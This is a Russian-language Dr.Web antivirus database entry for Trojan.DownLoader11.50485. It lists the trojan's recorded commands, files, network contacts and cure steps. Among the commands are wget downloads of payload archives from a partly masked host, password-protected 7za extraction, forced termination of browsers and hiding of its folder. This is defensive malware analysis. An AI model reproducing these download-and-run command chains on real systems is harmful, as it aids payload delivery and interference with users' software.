Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Trojan.DownLoader11.50485

Добавлен в вирусную базу Dr.Web: 2014-12-10

Описание добавлено:

Техническая информация

Вредоносные функции:
Создает и запускает на исполнение:
  • '%TEMP%\sysupd32\sleep.exe' 90
  • '%TEMP%\sysupd32\yandexbrowser.exe'
  • '%TEMP%\sysupd32\mailbrowser.exe'
  • '%APPDATA%\Mozilla\7za.exe' x sysff32.7z -pgfdklgjfdklgjfdkl7v897v89vjdsvbkjdsvkvhjkfbadjkvsdbvds8787v98sdvdbsjvbdjkcbaskcjsbd -aoa
  • '%TEMP%\sysupd32\7za.exe' x sysopera32.7z -pefjkelgjfkljdifudwjiofuf87f89d7v89fdyvjskhfcd -aoa
  • '%TEMP%\sysupd32\7za.exe' x syschrome32.7z -pefjkelgjfkljdifudwjiofuf87f89d7v89fdyvjskhfcd -aoa
  • '%TEMP%\sysupd32\operabrowser.exe'
  • '%TEMP%\sysupd32\wget.exe' -b --tries=5 --user=ie --password=fcbpidory http://ms####serupdate.pw/sysff32.7z
  • '%TEMP%\sysupd32\wget.exe' -b --tries=5 --user=ie --password=fcbpidory http://ms####serupdate.pw/sysopera32.7z
  • '%TEMP%\sysupd32\wget.exe' -b --tries=5 --user=ie --password=fcbpidory http://ms####serupdate.pw/syschrome32.7z
  • '%TEMP%\sysupd32\firefoxbrowser.exe'
  • '%TEMP%\sysupd32\chromebrowser.exe'
  • '%TEMP%\sysupd32\sleep.exe' 60
Запускает на исполнение:
  • '<SYSTEM32>\cmd.exe' /c ""%TEMP%\6.tmp\yandexbrowser.bat" "
  • '<SYSTEM32>\cmd.exe' /c ""%TEMP%\4.tmp\operabrowser.bat" "
  • '<SYSTEM32>\taskkill.exe' /f /im FIREFOX.EXE
  • '<SYSTEM32>\wbem\wmic.exe' NIC Get MACAddress
  • '<SYSTEM32>\taskkill.exe' /f /im opera.exe
  • '<SYSTEM32>\taskkill.exe' /f /im browser.exe
  • '<SYSTEM32>\taskkill.exe' /f /im chrome.exe
  • '<SYSTEM32>\cmd.exe' /c ""%TEMP%\3.tmp\firefoxbrowser.bat" "
  • '<SYSTEM32>\attrib.exe' +S +H %TEMP%\sysupd32
  • '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\start.bat" "
  • '<SYSTEM32>\cmd.exe' /c ""%TEMP%\2.tmp\chromebrowser.bat" "
  • '<SYSTEM32>\taskkill.exe' /f /im xpom.exe
  • '<SYSTEM32>\cmd.exe' /c ""%TEMP%\5.tmp\mailbrowser.bat" "
Завершает или пытается завершить
следующие пользовательские процессы:
  • firefox.exe
  • opera.exe
  • chrome.exe
Изменения в файловой системе:
Создает следующие файлы:
  • %TEMP%\3.tmp\firefoxbrowser.bat
  • %TEMP%\2.tmp\chromebrowser.bat
  • %TEMP%\5.tmp\mailbrowser.bat
  • %TEMP%\4.tmp\operabrowser.bat
  • %TEMP%\sysupd32\syschrome32.7z
  • %TEMP%\sysupd32\wget-log
  • %TEMP%\sysupd32\sysff32.7z
  • %TEMP%\sysupd32\sysopera32.7z
  • %TEMP%\6.tmp\yandexbrowser.bat
  • %TEMP%\tmpA.tmp
  • %TEMP%\tmp9.tmp
  • %TEMP%\tmpC.tmp
  • %TEMP%\tmpB.tmp
  • %APPDATA%\Mozilla\7za.exe
  • %APPDATA%\Mozilla\sysff32.7z
  • %TEMP%\tmp8.tmp
  • %TEMP%\tmp7.tmp
  • %TEMP%\1.tmp\firefoxbrowser.exe
  • %TEMP%\1.tmp\chromebrowser.exe
  • %TEMP%\1.tmp\mailbrowser.exe
  • %TEMP%\1.tmp\operabrowser.exe
  • %TEMP%\1.tmp\wget.exe
  • %TEMP%\1.tmp\start.bat
  • %TEMP%\1.tmp\7za.exe
  • %TEMP%\1.tmp\sleep.exe
  • %TEMP%\1.tmp\yandexbrowser.exe
  • %TEMP%\sysupd32\operabrowser.exe
  • %TEMP%\sysupd32\firefoxbrowser.exe
  • %TEMP%\sysupd32\yandexbrowser.exe
  • %TEMP%\sysupd32\mailbrowser.exe
  • %TEMP%\sysupd32\sleep.exe
  • %TEMP%\sysupd32\wget.exe
  • %TEMP%\sysupd32\chromebrowser.exe
  • %TEMP%\sysupd32\7za.exe
Удаляет следующие файлы:
  • %TEMP%\tmpB.tmp
  • %TEMP%\tmp9.tmp
  • %TEMP%\tmp7.tmp
Сетевая активность:
Подключается к:
  • 'ms####serupdate.pw':80
TCP:
Запросы HTTP GET:
  • ms####serupdate.pw/sysff32.7z
  • ms####serupdate.pw/sysopera32.7z
  • ms####serupdate.pw/syschrome32.7z
UDP:
  • DNS ASK ms####serupdate.pw
Другое:
Ищет следующие окна:
  • ClassName: '' WindowName: ''

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке